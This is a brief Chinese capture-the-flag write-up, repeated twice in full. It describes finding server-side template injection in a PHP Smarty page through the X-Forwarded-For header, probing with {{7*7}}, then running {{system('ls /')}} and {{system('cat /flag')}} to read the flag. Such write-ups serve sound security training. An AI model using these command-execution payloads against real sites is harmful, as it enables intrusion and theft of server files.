看到显示IP,修改xff头看看会不会有改变
加上xff头,发现有变化,于是猜测就是注入点了,这里尝试ssti看看,先上个{{7*7}}看看回显,发现是49,于是乎,
上图。对照测试结果为smart注入,是php的模版引擎,于是找到相应的payload,开注!
{{system('ls /')}}
{{system('cat /flag')}}
拿下。
看到显示IP,修改xff头看看会不会有改变
加上xff头,发现有变化,于是猜测就是注入点了,这里尝试ssti看看,先上个{{7*7}}看看回显,发现是49,于是乎,
上图。对照测试结果为smart注入,是php的模版引擎,于是找到相应的payload,开注!
{{system('ls /')}}
{{system('cat /flag')}}
拿下。